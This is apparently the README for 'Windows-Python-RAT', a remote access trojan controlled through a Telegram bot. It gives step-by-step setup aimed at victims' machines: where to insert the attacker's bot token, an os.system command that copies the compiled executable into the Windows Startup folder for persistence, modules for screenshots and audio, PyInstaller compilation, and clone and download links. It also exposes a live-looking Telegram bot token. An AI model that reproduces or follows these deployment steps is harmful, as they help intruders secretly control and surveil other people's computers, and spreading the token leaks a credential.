Bot ID: @W_P_RAT_Bot
Token: 586363223:AAHSLdPnAE60avs_T25l_HjzRahtw6PhxDY
To replace your robot Token in RAT, simply go to Line 35 in the Windows-Python-RAT.py file and place your API-TOKEN instead of TOKEN
.
In Line 35:
#Replace Your Bot API-TOKEN
update = Updater("TOKEN")
Example for Replace Token:
For startup setting, you must first write the name of your bot before compiling it in the Windows-Python-RAT.py file. For example, before compiling the RAT file, you need to go to line 281 and name it as an YOUR-COMPILED-RAT-NAME.exe
.
In Line 281:
os.system('copy YOUR-COMPILED-RAT-NAME.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"')
#replace your rat name on 'YOUR-COMPILED-RAT-NAME.exe'
Video Tutorial Setting Up a Startup on a RAT: Watch
Windows-Python-RAT requires Python version 2.7.x
Download Python Version 2.7.13: Click Here
Download for Windows (.msi)
Learning Install Python on Microsoft Windows: Click Here
To use the Windows-Python-RAT, you need to install the following modules in your python.
For automatic installation, you can first open the Setup.py (python Setup.py
) file and select the [1] Install Module
option.
To install the modules manually, simply enter the commands for installing each module in your CMD
or Terminal
.
Module List:
- Upgrade pip
python -m pip install --upgrade pip
- Python Telegram Bot (Telegram API for Python)
python -m pip install python-telegram-bot
- Pyttsx (for Play Voice)
python -m pip install pyttsx
- PyInstaller (for Compile py file)
python -m pip install pyinstaller
- Autopy (for Take Screenshot)
Download from Telegram Channel or PicoFile and Click on Autopy.exe for Install.
Password autopy-[@The404Hacking].rar
File is: @The404Hacking
learning Install AutoPy Module on Python 2: Watch
Download from Telegram Channel or PicoFile and Click on Autopy.exe for Install.
Password autopy-[@The404Hacking].rar
File is: @The404Hacking
- Linux:
git clone https://github.com/The404Hacking/Windows-Python-RAT.git
cd Windows-Python-RAT
python Setup.py
- Windows:
Download from https://github.com/The404Hacking/Windows-Python-RAT/archive/master.zip
Windows-Python-RAT-master.zip
Extract files.
cd Windows-Python-RAT
python Setup.py
Logo:
Setup ScreenShot:
RAT Control Panel @W_P_RAT_Bot:
Download: Click Here
Clone: git clone https://github.com/The404Hacking/Windows-Python-RAT.git